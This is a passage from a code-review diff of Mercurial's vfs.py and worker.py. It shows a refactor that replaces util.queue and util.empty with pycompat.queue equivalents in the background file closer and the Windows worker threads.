267 267 # because len(dirpath) < prefixlen.
268 268 prefixlen = len(pathutil.normasprefix(root))
269 269 for dirpath, dirs, files in os.walk(self.join(path), onerror=onerror):
270 270 yield (dirpath[prefixlen:], dirs, files)
271 271
272 272 @contextlib.contextmanager
273 273 def backgroundclosing(self, ui, expectedcount=-1):
274 274 """Allow files to be closed asynchronously.
275 275
276 276 When this context manager is active, ``backgroundclose`` can be passed
277 277 to ``__call__``/``open`` to result in the file possibly being closed
278 278 asynchronously, on a background thread.
279 279 """
280 280 # Sharing backgroundfilecloser between threads is complex and using
281 281 # multiple instances puts us at risk of running out of file descriptors
282 282 # only allow to use backgroundfilecloser when in main thread.
283 283 if not isinstance(threading.currentThread(), threading._MainThread):
284 284 yield
285 285 return
286 286 vfs = getattr(self, 'vfs', self)
287 287 if getattr(vfs, '_backgroundfilecloser', None):
288 288 raise error.Abort(
289 289 _('can only have 1 active background file closer'))
290 290
291 291 with backgroundfilecloser(ui, expectedcount=expectedcount) as bfc:
292 292 try:
293 293 vfs._backgroundfilecloser = bfc
294 294 yield bfc
295 295 finally:
296 296 vfs._backgroundfilecloser = None
297 297
298 298 class vfs(abstractvfs):
299 299 '''Operate files relative to a base directory
300 300
301 301 This class is used to hide the details of COW semantics and
302 302 remote file access from higher level code.
303 303
304 304 'cacheaudited' should be enabled only if (a) vfs object is short-lived, or
305 305 (b) the base directory is managed by hg and considered sort-of append-only.
306 306 See pathutil.pathauditor() for details.
307 307 '''
308 308 def __init__(self, base, audit=True, cacheaudited=False, expandpath=False,
309 309 realpath=False):
310 310 if expandpath:
311 311 base = util.expandpath(base)
312 312 if realpath:
313 313 base = os.path.realpath(base)
314 314 self.base = base
315 315 self._audit = audit
316 316 if audit:
317 317 self.audit = pathutil.pathauditor(self.base, cached=cacheaudited)
318 318 else:
319 319 self.audit = (lambda path, mode=None: True)
320 320 self.createmode = None
321 321 self._trustnlink = None
322 322
323 323 @util.propertycache
324 324 def _cansymlink(self):
325 325 return util.checklink(self.base)
326 326
327 327 @util.propertycache
328 328 def _chmod(self):
329 329 return util.checkexec(self.base)
330 330
331 331 def _fixfilemode(self, name):
332 332 if self.createmode is None or not self._chmod:
333 333 return
334 334 os.chmod(name, self.createmode & 0o666)
335 335
336 336 def __call__(self, path, mode="r", atomictemp=False, notindexed=False,
337 337 backgroundclose=False, checkambig=False, auditpath=True):
338 338 '''Open ``path`` file, which is relative to vfs root.
339 339
340 340 Newly created directories are marked as "not to be indexed by
341 341 the content indexing service", if ``notindexed`` is specified
342 342 for "write" mode access.
343 343
344 344 If ``backgroundclose`` is passed, the file may be closed asynchronously.
345 345 It can only be used if the ``self.backgroundclosing()`` context manager
346 346 is active. This should only be specified if the following criteria hold:
347 347
348 348 1. There is a potential for writing thousands of files. Unless you
349 349 are writing thousands of files, the performance benefits of
350 350 asynchronously closing files is not realized.
351 351 2. Files are opened exactly once for the ``backgroundclosing``
352 352 active duration and are therefore free of race conditions between
353 353 closing a file on a background thread and reopening it. (If the
354 354 file were opened multiple times, there could be unflushed data
355 355 because the original file handle hasn't been flushed/closed yet.)
356 356
357 357 ``checkambig`` argument is passed to atomictemplfile (valid
358 358 only for writing), and is useful only if target file is
359 359 guarded by any lock (e.g. repo.lock or repo.wlock).
360 360
361 361 To avoid file stat ambiguity forcibly, checkambig=True involves
362 362 copying ``path`` file opened in "append" mode (e.g. for
363 363 truncation), if it is owned by another. Therefore, use
364 364 combination of append mode and checkambig=True only in limited
365 365 cases (see also issue5418 and issue5584 for detail).
366 366 '''
367 367 if auditpath:
368 368 if self._audit:
369 369 r = util.checkosfilename(path)
370 370 if r:
371 371 raise error.Abort("%s: %r" % (r, path))
372 372 self.audit(path, mode=mode)
373 373 f = self.join(path)
374 374
375 375 if "b" not in mode:
376 376 mode += "b" # for that other OS
377 377
378 378 nlink = -1
379 379 if mode not in ('r', 'rb'):
380 380 dirname, basename = util.split(f)
381 381 # If basename is empty, then the path is malformed because it points
382 382 # to a directory. Let the posixfile() call below raise IOError.
383 383 if basename:
384 384 if atomictemp:
385 385 util.makedirs(dirname, self.createmode, notindexed)
386 386 return util.atomictempfile(f, mode, self.createmode,
387 387 checkambig=checkambig)
388 388 try:
389 389 if 'w' in mode:
390 390 util.unlink(f)
391 391 nlink = 0
392 392 else:
393 393 # nlinks() may behave differently for files on Windows
394 394 # shares if the file is open.
395 395 with util.posixfile(f):
396 396 nlink = util.nlinks(f)
397 397 if nlink < 1:
398 398 nlink = 2 # force mktempcopy (issue1922)
399 399 except (OSError, IOError) as e:
400 400 if e.errno != errno.ENOENT:
401 401 raise
402 402 nlink = 0
403 403 util.makedirs(dirname, self.createmode, notindexed)
404 404 if nlink > 0:
405 405 if self._trustnlink is None:
406 406 self._trustnlink = nlink > 1 or util.checknlink(f)
407 407 if nlink > 1 or not self._trustnlink:
408 408 util.rename(util.mktempcopy(f), f)
409 409 fp = util.posixfile(f, mode)
410 410 if nlink == 0:
411 411 self._fixfilemode(f)
412 412
413 413 if checkambig:
414 414 if mode in ('r', 'rb'):
415 415 raise error.Abort(_('implementation error: mode %s is not'
416 416 ' valid for checkambig=True') % mode)
417 417 fp = checkambigatclosing(fp)
418 418
419 419 if (backgroundclose and
420 420 isinstance(threading.currentThread(), threading._MainThread)):
421 421 if not self._backgroundfilecloser:
422 422 raise error.Abort(_('backgroundclose can only be used when a '
423 423 'backgroundclosing context manager is active')
424 424 )
425 425
426 426 fp = delayclosedfile(fp, self._backgroundfilecloser)
427 427
428 428 return fp
429 429
430 430 def symlink(self, src, dst):
431 431 self.audit(dst)
432 432 linkname = self.join(dst)
433 433 util.tryunlink(linkname)
434 434
435 435 util.makedirs(os.path.dirname(linkname), self.createmode)
436 436
437 437 if self._cansymlink:
438 438 try:
439 439 os.symlink(src, linkname)
440 440 except OSError as err:
441 441 raise OSError(err.errno, _('could not symlink to %r: %s') %
442 442 (src, encoding.strtolocal(err.strerror)),
443 443 linkname)
444 444 else:
445 445 self.write(dst, src)
446 446
447 447 def join(self, path, *insidef):
448 448 if path:
449 449 return os.path.join(self.base, path, *insidef)
450 450 else:
451 451 return self.base
452 452
453 453 opener = vfs
454 454
455 455 class proxyvfs(object):
456 456 def __init__(self, vfs):
457 457 self.vfs = vfs
458 458
459 459 @property
460 460 def options(self):
461 461 return self.vfs.options
462 462
463 463 @options.setter
464 464 def options(self, value):
465 465 self.vfs.options = value
466 466
467 467 class filtervfs(abstractvfs, proxyvfs):
468 468 '''Wrapper vfs for filtering filenames with a function.'''
469 469
470 470 def __init__(self, vfs, filter):
471 471 proxyvfs.__init__(self, vfs)
472 472 self._filter = filter
473 473
474 474 def __call__(self, path, *args, **kwargs):
475 475 return self.vfs(self._filter(path), *args, **kwargs)
476 476
477 477 def join(self, path, *insidef):
478 478 if path:
479 479 return self.vfs.join(self._filter(self.vfs.reljoin(path, *insidef)))
480 480 else:
481 481 return self.vfs.join(path)
482 482
483 483 filteropener = filtervfs
484 484
485 485 class readonlyvfs(abstractvfs, proxyvfs):
486 486 '''Wrapper vfs preventing any writing.'''
487 487
488 488 def __init__(self, vfs):
489 489 proxyvfs.__init__(self, vfs)
490 490
491 491 def __call__(self, path, mode='r', *args, **kw):
492 492 if mode not in ('r', 'rb'):
493 493 raise error.Abort(_('this vfs is read only'))
494 494 return self.vfs(path, mode, *args, **kw)
495 495
496 496 def join(self, path, *insidef):
497 497 return self.vfs.join(path, *insidef)
498 498
499 499 class closewrapbase(object):
500 500 """Base class of wrapper, which hooks closing
501 501
502 502 Do not instantiate outside of the vfs layer.
503 503 """
504 504 def __init__(self, fh):
505 505 object.__setattr__(self, r'_origfh', fh)
506 506
507 507 def __getattr__(self, attr):
508 508 return getattr(self._origfh, attr)
509 509
510 510 def __setattr__(self, attr, value):
511 511 return setattr(self._origfh, attr, value)
512 512
513 513 def __delattr__(self, attr):
514 514 return delattr(self._origfh, attr)
515 515
516 516 def __enter__(self):
517 517 return self._origfh.__enter__()
518 518
519 519 def __exit__(self, exc_type, exc_value, exc_tb):
520 520 raise NotImplementedError('attempted instantiating ' + str(type(self)))
521 521
522 522 def close(self):
523 523 raise NotImplementedError('attempted instantiating ' + str(type(self)))
524 524
525 525 class delayclosedfile(closewrapbase):
526 526 """Proxy for a file object whose close is delayed.
527 527
528 528 Do not instantiate outside of the vfs layer.
529 529 """
530 530 def __init__(self, fh, closer):
531 531 super(delayclosedfile, self).__init__(fh)
532 532 object.__setattr__(self, r'_closer', closer)
533 533
534 534 def __exit__(self, exc_type, exc_value, exc_tb):
535 535 self._closer.close(self._origfh)
536 536
537 537 def close(self):
538 538 self._closer.close(self._origfh)
539 539
540 540 class backgroundfilecloser(object):
541 541 """Coordinates background closing of file handles on multiple threads."""
542 542 def __init__(self, ui, expectedcount=-1):
543 543 self._running = False
544 544 self._entered = False
545 545 self._threads = []
546 546 self._threadexception = None
547 547
548 548 # Only Windows/NTFS has slow file closing. So only enable by default
549 549 # on that platform. But allow to be enabled elsewhere for testing.
550 550 defaultenabled = pycompat.iswindows
551 551 enabled = ui.configbool('worker', 'backgroundclose', defaultenabled)
552 552
553 553 if not enabled:
554 554 return
555 555
556 556 # There is overhead to starting and stopping the background threads.
557 557 # Don't do background processing unless the file count is large enough
558 558 # to justify it.
559 559 minfilecount = ui.configint('worker', 'backgroundcloseminfilecount')
560 560 # FUTURE dynamically start background threads after minfilecount closes.
561 561 # (We don't currently have any callers that don't know their file count)
562 562 if expectedcount > 0 and expectedcount < minfilecount:
563 563 return
564 564
565 565 maxqueue = ui.configint('worker', 'backgroundclosemaxqueue')
566 566 threadcount = ui.configint('worker', 'backgroundclosethreadcount')
567 567
568 568 ui.debug('starting %d threads for background file closing\n' %
569 569 threadcount)
570 570
571 self._queue = util.queue(maxsize=maxqueue)
571 self._queue = pycompat.queue.Queue(maxsize=maxqueue)
572 572 self._running = True
573 573
574 574 for i in range(threadcount):
575 575 t = threading.Thread(target=self._worker, name='backgroundcloser')
576 576 self._threads.append(t)
577 577 t.start()
578 578
579 579 def __enter__(self):
580 580 self._entered = True
581 581 return self
582 582
583 583 def __exit__(self, exc_type, exc_value, exc_tb):
584 584 self._running = False
585 585
586 586 # Wait for threads to finish closing so open files don't linger for
587 587 # longer than lifetime of context manager.
588 588 for t in self._threads:
589 589 t.join()
590 590
591 591 def _worker(self):
592 592 """Main routine for worker thread."""
593 593 while True:
594 594 try:
595 595 fh = self._queue.get(block=True, timeout=0.100)
596 596 # Need to catch or the thread will terminate and
597 597 # we could orphan file descriptors.
598 598 try:
599 599 fh.close()
600 600 except Exception as e:
601 601 # Stash so can re-raise from main thread later.
602 602 self._threadexception = e
603 except util.empty:
603 except pycompat.queue.Empty:
604 604 if not self._running:
605 605 break
606 606
607 607 def close(self, fh):
608 608 """Schedule a file for closing."""
609 609 if not self._entered:
610 610 raise error.Abort(_('can only call close() when context manager '
611 611 'active'))
612 612
613 613 # If a background thread encountered an exception, raise now so we fail
614 614 # fast. Otherwise we may potentially go on for minutes until the error
615 615 # is acted on.
616 616 if self._threadexception:
617 617 e = self._threadexception
618 618 self._threadexception = None
619 619 raise e
620 620
621 621 # If we're not actively running, close synchronously.
622 622 if not self._running:
623 623 fh.close()
624 624 return
625 625
626 626 self._queue.put(fh, block=True, timeout=None)
627 627
628 628 class checkambigatclosing(closewrapbase):
629 629 """Proxy for a file object, to avoid ambiguity of file stat
630 630
631 631 See also util.filestat for detail about "ambiguity of file stat".
632 632
633 633 This proxy is useful only if the target file is guarded by any
634 634 lock (e.g. repo.lock or repo.wlock)
635 635
636 636 Do not instantiate outside of the vfs layer.
637 637 """
638 638 def __init__(self, fh):
639 639 super(checkambigatclosing, self).__init__(fh)
640 640 object.__setattr__(self, r'_oldstat', util.filestat.frompath(fh.name))
641 641
642 642 def _checkambig(self):
643 643 oldstat = self._oldstat
644 644 if oldstat.stat:
645 645 _avoidambig(self._origfh.name, oldstat)
646 646
647 647 def __exit__(self, exc_type, exc_value, exc_tb):
648 648 self._origfh.__exit__(exc_type, exc_value, exc_tb)
649 649 self._checkambig()
650 650
651 651 def close(self):
652 652 self._origfh.close()
653 653 self._checkambig()
@@ -1,327 +1,327 b''
1 1 # worker.py - master-slave parallelism support
2 2 #
3 3 # Copyright 2013 Facebook, Inc.
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 from __future__ import absolute_import
9 9
10 10 import errno
11 11 import os
12 12 import signal
13 13 import sys
14 14 import threading
15 15 import time
16 16
17 17 from .i18n import _
18 18 from . import (
19 19 encoding,
20 20 error,
21 21 pycompat,
22 22 scmutil,
23 23 util,
24 24 )
25 25
26 26 def countcpus():
27 27 '''try to count the number of CPUs on the system'''
28 28
29 29 # posix
30 30 try:
31 31 n = int(os.sysconf(r'SC_NPROCESSORS_ONLN'))
32 32 if n > 0:
33 33 return n
34 34 except (AttributeError, ValueError):
35 35 pass
36 36
37 37 # windows
38 38 try:
39 39 n = int(encoding.environ['NUMBER_OF_PROCESSORS'])
40 40 if n > 0:
41 41 return n
42 42 except (KeyError, ValueError):
43 43 pass
44 44
45 45 return 1
46 46
47 47 def _numworkers(ui):
48 48 s = ui.config('worker', 'numcpus')
49 49 if s:
50 50 try:
51 51 n = int(s)
52 52 if n >= 1:
53 53 return n
54 54 except ValueError:
55 55 raise error.Abort(_('number of cpus must be an integer'))
56 56 return min(max(countcpus(), 4), 32)
57 57
58 58 if pycompat.isposix or pycompat.iswindows:
59 59 _startupcost = 0.01
60 60 else:
61 61 _startupcost = 1e30
62 62
63 63 def worthwhile(ui, costperop, nops):
64 64 '''try to determine whether the benefit of multiple processes can
65 65 outweigh the cost of starting them'''
66 66 linear = costperop * nops
67 67 workers = _numworkers(ui)
68 68 benefit = linear - (_startupcost * workers + linear / workers)
69 69 return benefit >= 0.15
70 70
71 71 def worker(ui, costperarg, func, staticargs, args):
72 72 '''run a function, possibly in parallel in multiple worker
73 73 processes.
74 74
75 75 returns a progress iterator
76 76
77 77 costperarg - cost of a single task
78 78
79 79 func - function to run
80 80
81 81 staticargs - arguments to pass to every invocation of the function
82 82
83 83 args - arguments to split into chunks, to pass to individual
84 84 workers
85 85 '''
86 86 enabled = ui.configbool('worker', 'enabled')
87 87 if enabled and worthwhile(ui, costperarg, len(args)):
88 88 return _platformworker(ui, func, staticargs, args)
89 89 return func(*staticargs + (args,))
90 90
91 91 def _posixworker(ui, func, staticargs, args):
92 92 rfd, wfd = os.pipe()
93 93 workers = _numworkers(ui)
94 94 oldhandler = signal.getsignal(signal.SIGINT)
95 95 signal.signal(signal.SIGINT, signal.SIG_IGN)
96 96 pids, problem = set(), [0]
97 97 def killworkers():
98 98 # unregister SIGCHLD handler as all children will be killed. This
99 99 # function shouldn't be interrupted by another SIGCHLD; otherwise pids
100 100 # could be updated while iterating, which would cause inconsistency.
101 101 signal.signal(signal.SIGCHLD, oldchldhandler)
102 102 # if one worker bails, there's no good reason to wait for the rest
103 103 for p in pids:
104 104 try:
105 105 os.kill(p, signal.SIGTERM)
106 106 except OSError as err:
107 107 if err.errno != errno.ESRCH:
108 108 raise
109 109 def waitforworkers(blocking=True):
110 110 for pid in pids.copy():
111 111 p = st = 0
112 112 while True:
113 113 try:
114 114 p, st = os.waitpid(pid, (0 if blocking else os.WNOHANG))
115 115 break
116 116 except OSError as e:
117 117 if e.errno == errno.EINTR:
118 118 continue
119 119 elif e.errno == errno.ECHILD:
120 120 # child would already be reaped, but pids yet been
121 121 # updated (maybe interrupted just after waitpid)
122 122 pids.discard(pid)
123 123 break
124 124 else:
125 125 raise
126 126 if not p:
127 127 # skip subsequent steps, because child process should
128 128 # be still running in this case
129 129 continue
130 130 pids.discard(p)
131 131 st = _exitstatus(st)
132 132 if st and not problem[0]:
133 133 problem[0] = st
134 134 def sigchldhandler(signum, frame):
135 135 waitforworkers(blocking=False)
136 136 if problem[0]:
137 137 killworkers()
138 138 oldchldhandler = signal.signal(signal.SIGCHLD, sigchldhandler)
139 139 ui.flush()
140 140 parentpid = os.getpid()
141 141 for pargs in partition(args, workers):
142 142 # make sure we use os._exit in all worker code paths. otherwise the
143 143 # worker may do some clean-ups which could cause surprises like
144 144 # deadlock. see sshpeer.cleanup for example.
145 145 # override error handling *before* fork. this is necessary because
146 146 # exception (signal) may arrive after fork, before "pid =" assignment
147 147 # completes, and other exception handler (dispatch.py) can lead to
148 148 # unexpected code path without os._exit.
149 149 ret = -1
150 150 try:
151 151 pid = os.fork()
152 152 if pid == 0:
153 153 signal.signal(signal.SIGINT, oldhandler)
154 154 signal.signal(signal.SIGCHLD, oldchldhandler)
155 155
156 156 def workerfunc():
157 157 os.close(rfd)
158 158 for i, item in func(*(staticargs + (pargs,))):
159 159 os.write(wfd, '%d %s\n' % (i, item))
160 160 return 0
161 161
162 162 ret = scmutil.callcatch(ui, workerfunc)
163 163 except: # parent re-raises, child never returns
164 164 if os.getpid() == parentpid:
165 165 raise
166 166 exctype = sys.exc_info()[0]
167 167 force = not issubclass(exctype, KeyboardInterrupt)
168 168 ui.traceback(force=force)
169 169 finally:
170 170 if os.getpid() != parentpid:
171 171 try:
172 172 ui.flush()
173 173 except: # never returns, no re-raises
174 174 pass
175 175 finally:
176 176 os._exit(ret & 255)
177 177 pids.add(pid)
178 178 os.close(wfd)
179 179 fp = os.fdopen(rfd, r'rb', 0)
180 180 def cleanup():
181 181 signal.signal(signal.SIGINT, oldhandler)
182 182 waitforworkers()
183 183 signal.signal(signal.SIGCHLD, oldchldhandler)
184 184 status = problem[0]
185 185 if status:
186 186 if status < 0:
187 187 os.kill(os.getpid(), -status)
188 188 sys.exit(status)
189 189 try:
190 190 for line in util.iterfile(fp):
191 191 l = line.split(' ', 1)
192 192 yield int(l[0]), l[1][:-1]
193 193 except: # re-raises
194 194 killworkers()
195 195 cleanup()
196 196 raise
197 197 cleanup()
198 198
199 199 def _posixexitstatus(code):
200 200 '''convert a posix exit status into the same form returned by
201 201 os.spawnv
202 202
203 203 returns None if the process was stopped instead of exiting'''
204 204 if os.WIFEXITED(code):
205 205 return os.WEXITSTATUS(code)
206 206 elif os.WIFSIGNALED(code):
207 207 return -os.WTERMSIG(code)
208 208
209 209 def _windowsworker(ui, func, staticargs, args):
210 210 class Worker(threading.Thread):
211 211 def __init__(self, taskqueue, resultqueue, func, staticargs,
212 212 group=None, target=None, name=None, verbose=None):
213 213 threading.Thread.__init__(self, group=group, target=target,
214 214 name=name, verbose=verbose)
215 215 self._taskqueue = taskqueue
216 216 self._resultqueue = resultqueue
217 217 self._func = func
218 218 self._staticargs = staticargs
219 219 self._interrupted = False
220 220 self.daemon = True
221 221 self.exception = None
222 222
223 223 def interrupt(self):
224 224 self._interrupted = True
225 225
226 226 def run(self):
227 227 try:
228 228 while not self._taskqueue.empty():
229 229 try:
230 230 args = self._taskqueue.get_nowait()
231 231 for res in self._func(*self._staticargs + (args,)):
232 232 self._resultqueue.put(res)
233 233 # threading doesn't provide a native way to
234 234 # interrupt execution. handle it manually at every
235 235 # iteration.
236 236 if self._interrupted:
237 237 return
238 except util.empty:
238 except pycompat.queue.Empty:
239 239 break
240 240 except Exception as e:
241 241 # store the exception such that the main thread can resurface
242 242 # it as if the func was running without workers.
243 243 self.exception = e
244 244 raise
245 245
246 246 threads = []
247 247 def trykillworkers():
248 248 # Allow up to 1 second to clean worker threads nicely
249 249 cleanupend = time.time() + 1
250 250 for t in threads:
251 251 t.interrupt()
252 252 for t in threads:
253 253 remainingtime = cleanupend - time.time()
254 254 t.join(remainingtime)
255 255 if t.is_alive():
256 256 # pass over the workers joining failure. it is more
257 257 # important to surface the inital exception than the
258 258 # fact that one of workers may be processing a large
259 259 # task and does not get to handle the interruption.
260 260 ui.warn(_("failed to kill worker threads while "
261 261 "handling an exception\n"))
262 262 return
263 263
264 264 workers = _numworkers(ui)
265 resultqueue = util.queue()
266 taskqueue = util.queue()
265 resultqueue = pycompat.queue.Queue()
266 taskqueue = pycompat.queue.Queue()
267 267 # partition work to more pieces than workers to minimize the chance
268 268 # of uneven distribution of large tasks between the workers
269 269 for pargs in partition(args, workers * 20):
270 270 taskqueue.put(pargs)
271 271 for _i in range(workers):
272 272 t = Worker(taskqueue, resultqueue, func, staticargs)
273 273 threads.append(t)
274 274 t.start()
275 275 try:
276 276 while len(threads) > 0:
277 277 while not resultqueue.empty():
278 278 yield resultqueue.get()
279 279 threads[0].join(0.05)
280 280 finishedthreads = [_t for _t in threads if not _t.is_alive()]
281 281 for t in finishedthreads:
282 282 if t.exception is not None:
283 283 raise t.exception
284 284 threads.remove(t)
285 285 except (Exception, KeyboardInterrupt): # re-raises
286 286 trykillworkers()
287 287 raise
288 288 while not resultqueue.empty():
289 289 yield resultqueue.get()
290 290
291 291 if pycompat.iswindows:
292 292 _platformworker = _windowsworker
293 293 else:
294 294 _platformworker = _posixworker
295 295 _exitstatus = _posixexitstatus
296 296
297 297 def partition(lst, nslices):
298 298 '''partition a list into N slices of roughly equal size
299 299
300 300 The current strategy takes every Nth element from the input. If
301 301 we ever write workers that need to preserve grouping in input
302 302 we should consider allowing callers to specify a partition strategy.
303 303
304 304 mpm is not a fan of this partitioning strategy when files are involved.
305 305 In his words:
306 306
307 307 Single-threaded Mercurial makes a point of creating and visiting
308 308 files in a fixed order (alphabetical). When creating files in order,
309 309 a typical filesystem is likely to allocate them on nearby regions on
310 310 disk. Thus, when revisiting in the same order, locality is maximized
311 311 and various forms of OS and disk-level caching and read-ahead get a
312 312 chance to work.
313 313
314 314 This effect can be quite significant on spinning disks. I discovered it
315 315 circa Mercurial v0.4 when revlogs were named by hashes of filenames.
316 316 Tarring a repo and copying it to another disk effectively randomized
317 317 the revlog ordering on disk by sorting the revlogs by hash and suddenly
318 318 performance of my kernel checkout benchmark dropped by ~10x because the
319 319 "working set" of sectors visited no longer fit in the drive's cache and
320 320 the workload switched from streaming to random I/O.
321 321
322 322 What we should really be doing is have workers read filenames from a
323 323 ordered queue. This preserves locality and also keeps any worker from
324 324 getting more than one file out of balance.
325 325 '''
326 326 for i in range(nslices):
327 327 yield lst[i::nslices]
General Comments 0
You need to be logged in to leave comments. Login now